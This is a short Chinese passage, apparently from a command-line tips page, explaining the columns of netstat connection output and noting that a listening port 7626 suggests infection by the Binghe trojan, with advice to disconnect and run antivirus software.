  解釋一下,Active Connections是指當前本機活動連接,Proto是指連接使用的協議名稱,Local Address是本地計算機的 IP 地址和連接正在使用的端口號,Foreign Address是連接該端口的遠程計算機的 IP 地址和端口號,State則是表明TCP 連接的狀態,你可以看到后面三行的監聽端口是UDP協議的,所以沒有State表示的狀態。通過以上可以看出該機器的7626端口已經開放,正在監聽等待連接,像這樣的情況極有可能是已經感染了冰河!所以應該急忙斷開網絡,并用殺毒軟件查殺病毒。
收藏 贊() 踩()
本文地址:http://www.lenmiz.tw/jiqiao/335.html
本文標簽:CMD集錦
評論
26选5开奖走势图